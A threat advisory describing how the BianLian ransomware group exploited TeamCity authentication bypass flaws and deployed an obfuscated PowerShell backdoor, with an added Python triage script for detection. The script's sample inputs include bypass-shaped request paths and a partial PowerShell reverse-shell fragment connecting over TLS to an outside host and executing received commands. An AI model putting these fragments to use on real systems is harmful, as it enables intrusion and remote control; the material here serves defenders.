Threat Advisory

BianLian Ransomware Group Leveraging JetBrains TeamCity Exploits in Ransom Campaigns

Threat: Ransomware
Criticality: High
EXECUTIVE SUMMARY:

 

Researchers have observed an escalating threat from an adversary group, tracked as BianLian, that moved to data-extortion operations without encryption after Avast released a decryptor for its ransomware. The group has repeatedly adapted to changing conditions, in particular by moving quickly on newly disclosed vulnerabilities. In a recent incident, our team responded to an intrusion that began with the exploitation of a vulnerable JetBrains TeamCity server, which illustrates the group's current modus operandi. This advisory covers the technical aspects of that intrusion: the initial exploitation, the post-exploitation activity, and the PowerShell implementation of the group's backdoor.

 

The intrusion began with the exploitation of a vulnerable TeamCity server through CVE-2024-27198 or CVE-2023-42793, both authentication bypass flaws in TeamCity On-Premises. After gaining initial access, the threat actor used native Windows commands to map the victim's network. They then pivoted to two build servers, where they used the legitimate winpty-agent.exe binary for remote command execution. Further activity included the deployment of a PowerShell script, web.ps1, and attempts to dump credentials. Notably, BianLian fell back to a PowerShell implementation of their Go backdoor after their usual Go backdoor failed to run. Although obfuscated, the PowerShell script exposed its network functionality, including creation of a TCP socket and use of an SSL stream over it, consistent with a backdoor that provides remote access over an encrypted channel. Attribution to BianLian rests on shared infrastructure and matching antivirus detections.
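Two triage checks that follow from the chain above, written here as an added example (this is not code from the advisory, from the responders, or from the threat actor). The first hunts a TeamCity reverse-proxy access log for the request shape publicly documented for the CVE-2024-27198 bypass (a `jsp=` query parameter whose value ends in `;.jsp`); that path shape and the combined-log line format are assumptions taken from public write-ups, not from this advisory. The second scores a PowerShell script block (for example the content of a PowerShell script-block-logging event, Event ID 4104) for the capabilities the advisory attributes to the backdoor, TCP socket creation plus SslStream use, together with common obfuscation markers. All log lines and script text are constructed for the example.

```python
"""Triage helpers for a TeamCity-to-PowerShell-backdoor intrusion.

Added example; not code from the advisory or from any named party.
All sample inputs below are constructed, not captured.
"""
import re
from dataclasses import dataclass

# --- 1. TeamCity access-log hunt -------------------------------------------
# Combined-log style line (an assumed format; adapt the regex to the real log):
# <ip> - - [<timestamp>] "<METHOD> <path> HTTP/1.1" <status> <bytes>
_REQ_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)
# Path shape from public CVE-2024-27198 write-ups (assumption, not from this
# advisory): a "jsp=" parameter whose value is a real endpoint ending in ";.jsp".
_BYPASS_RE = re.compile(r'[?&]jsp=/\S*;\.jsp', re.IGNORECASE)


@dataclass
class Hit:
    ip: str
    ts: str
    path: str
    status: int


def hunt_teamcity_bypass(lines):
    """Return request lines whose path matches the bypass shape."""
    hits = []
    for line in lines:
        m = _REQ_RE.match(line)
        if m and _BYPASS_RE.search(m.group("path")):
            hits.append(Hit(m.group("ip"), m.group("ts"),
                            m.group("path"), int(m.group("status"))))
    return hits


# --- 2. PowerShell script-block scoring -------------------------------------
# Capabilities the advisory attributes to the backdoor, as .NET type references.
_CAPABILITY = {
    "tcp_socket": re.compile(r"System\.Net\.Sockets\.TcpClient", re.I),
    "ssl_stream": re.compile(r"System\.Net\.Security\.SslStream", re.I),
    "cert_validation_bypass": re.compile(r"RemoteCertificateValidationCallback", re.I),
    "stream_io": re.compile(r"\.(Read|Write)\(", re.I),
}
# Generic obfuscation markers; any one alone is weak evidence.
_OBFUSCATION = {
    "char_codes": re.compile(r"\[char\]\s*\d+", re.I),
    "iex": re.compile(r"\biex\b|Invoke-Expression", re.I),
    "base64": re.compile(r"FromBase64String", re.I),
    "backtick_split": re.compile(r"[A-Za-z]`[A-Za-z]"),
}


def score_powershell_block(text):
    """Score 0-100: a TLS-wrapped TCP socket is the core signal,
    obfuscation markers raise confidence but are not required."""
    cap = [k for k, rx in _CAPABILITY.items() if rx.search(text)]
    obf = [k for k, rx in _OBFUSCATION.items() if rx.search(text)]
    score = 60 if ("tcp_socket" in cap and "ssl_stream" in cap) else (20 if cap else 0)
    score += 10 * len(obf)
    return {"score": min(score, 100), "capabilities": cap, "obfuscation": obf}


# --- Constructed sample inputs ---------------------------------------------
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [05/Mar/2024:10:14:02 +0000] "GET /login.html HTTP/1.1" 200 5120',
    '203.0.113.7 - - [05/Mar/2024:10:14:09 +0000] "GET /hax?jsp=/app/rest/users;.jsp HTTP/1.1" 200 812',
    '203.0.113.7 - - [05/Mar/2024:10:14:11 +0000] "GET /hax?jsp=/app/rest/server;.jsp HTTP/1.1" 200 640',
    '198.51.100.4 - - [05/Mar/2024:10:15:30 +0000] "GET /app/rest/server HTTP/1.1" 401 0',
]

SAMPLE_BENIGN_BLOCK = r'''
$web = New-Object System.Net.WebClient
$web.DownloadString("https://updates.example.internal/manifest.json") | ConvertFrom-Json
'''

# Fragment with the indicator shapes only; the command loop is omitted.
SAMPLE_BACKDOOR_BLOCK = r'''
$c = New-Object System.Net.Sockets.TcpClient("203.0.113.9", 443)
$cb = [Net.Security.RemoteCertificateValidationCallback]{ $true }
$s = New-Object System.Net.Security.SslStream($c.GetStream(), $false, $cb)
$s.AuthenticateAsClient("x")
$n = $s.Read($buf, 0, $buf.Length)
$out = I`EX $cmd 2>&1 | Out-String
$s.Write($bytes, 0, $bytes.Length)
'''

if __name__ == "__main__":
    for h in hunt_teamcity_bypass(SAMPLE_ACCESS_LOG):
        print(f"bypass-shaped request from {h.ip} at {h.ts}: {h.path} -> {h.status}")
    print("benign :", score_powershell_block(SAMPLE_BENIGN_BLOCK))
    print("backdoor:", score_powershell_block(SAMPLE_BACKDOOR_BLOCK))
```

Both checks are string matching and are meant as triage aids, not as the sole detection: a different encoding of the request path, or a script that builds type names from fragments at run time, evades them. A bypass-shaped request that returned 200 should be treated as a confirmed unauthenticated API call until the server's own logs prove otherwise, and script-block logging must already be enabled for the second check to have anything to read.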

 

The evolving tactics of groups like BianLian call for proactive measures. Patching internet-facing build and CI systems such as TeamCity promptly, logging and monitoring them for unauthenticated API access, enabling PowerShell script block logging on servers, and maintaining tested incident response procedures are the most direct mitigations for the chain described here. Organizations that track emerging exploitation trends and prepare accordingly are better placed to limit the impact of such intrusions.

 

THREAT PROFILE:

REFERENCES:

The following reports contain further technical details:

https://thehackernews.com/2024/03/bianlian-threat-actors-exploiting.html
